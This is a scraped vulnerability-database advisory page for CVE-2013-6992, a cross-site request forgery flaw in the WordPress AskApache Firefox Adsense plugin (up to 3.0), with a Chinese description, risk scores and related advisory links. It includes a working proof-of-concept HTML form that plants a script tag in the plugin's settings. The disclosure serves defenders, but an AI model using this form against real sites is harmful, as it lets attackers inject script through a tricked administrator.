Lucene search
RootSSV:61228HistoryDec 27, 2013 - 12:00 a.m.
Wordpress AskApache Firefox Adsense插件跨站请求伪造漏洞
2013-12-2700:00:00
Root
www.seebug.org
17
0.004 Low
EPSS
Percentile
71.4%
CVE ID:CVE-2013-6992
WordPress是一款内容管理系统。
由于 "/wp-admin/options-general.php"脚本未充分验证HTTP请求源,远程攻击者可以欺骗管理员访问含有CSRF代码的恶意链接,在受影响网站的浏览器上下文中执行任意HTML和脚本代码。
0
Wordpress AskApache Firefox Adsense<=3.0
官方禁用易受攻击的插件。
The exploitation example below injects JavaScript code, which uses the "alert()" function to display "immuniweb" word:
<form action="http://[host]/wp-admin/options-general.php?page=askapache-firefox-adsense.php" method="post" name="main">
<input type="hidden" name="aafireadcode" value='<script>alert("immuniweb");</script>'>
<input type="submit" id="btn">
</form>
Related
cve
cve
CVE-2013-6992
2014-01-03 18:54:00
prion
prion
Cross site request forgery (csrf)
2014-01-03 18:54:00
wpvulndb
wpvulndb
AskApache Firefox Adsense 3.0 - Unspecified CSRF
2014-08-01 10:59:07
packetstorm
packetstorm
AskApache 3.0 Cross Site Request Forgery
2013-12-26 00:00:00
patchstack
patchstack
WordPress Firefox Adsense Plugin <= 3.0 - CSRF and XSS
2013-12-06 00:00:00
securityvulns
securityvulns
htbridge
htbridge
zdt
zdt
AskApache 3.0 Cross Site Request Forgery Vulnerability
2013-12-27 00:00:00
cvelist
cvelist
CVE-2013-6992
2014-01-02 15:00:00